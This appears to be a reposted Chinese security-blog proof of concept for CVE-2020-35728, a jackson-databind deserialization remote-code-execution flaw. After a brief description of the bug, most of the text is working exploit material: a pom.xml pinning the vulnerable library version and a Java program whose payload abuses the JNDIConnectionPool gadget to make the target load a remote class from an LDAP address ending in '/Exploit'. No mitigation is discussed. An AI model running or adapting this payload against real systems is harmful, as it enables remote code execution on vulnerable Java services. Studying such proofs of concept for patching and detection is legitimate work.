CVE-2020-35728 - RCE FasterXML POC

  • A+
所属分类:安全文章


        FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。

        2.9.10.8之前的FasterXML jackson-databind 2.x对序列化小工具和打字之间的交互处理不当,与com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool(也就是org.glassfish.web/javax.servlet.jsp.jstl中的嵌入式Xalan)有关。

        此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。

pom.xml

<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">    <modelVersion>4.0.0</modelVersion>
<groupId>com.jacksonTest</groupId> <artifactId>jacksonTest</artifactId> <version>1.0-SNAPSHOT</version> <dependencies> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-databind</artifactId> <version>2.9.10.7</version> </dependency> <!-- https://mvnrepository.com/artifact/org.glassfish.web/jakarta.servlet.jsp.jstl --> <dependency> <groupId>org.glassfish.web</groupId> <artifactId>jakarta.servlet.jsp.jstl</artifactId> <version>2.0.0</version> </dependency>

<dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-nop</artifactId> <version>1.7.2</version> </dependency> <!-- https://mvnrepository.com/artifact/javax.transaction/jta --> <dependency> <groupId>javax.transaction</groupId> <artifactId>jta</artifactId> <version>1.1</version> </dependency> </dependencies></project>



poc.java

import com.fasterxml.jackson.databind.ObjectMapper;
public class POC { public static void main(String[] args) throws Exception { String payload = "["com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool",{"jndiPath":"ldap://127.0.0.1:1088/Exploit"}]"; ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); Object obj = mapper.readValue(payload, Object.class); mapper.writeValueAsString(obj); }}


参考文献:

https://github.com/Al1ex/CVE-2020-35728

本文始发于微信公众号(Khan安全团队):CVE-2020-35728 - RCE FasterXML POC

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: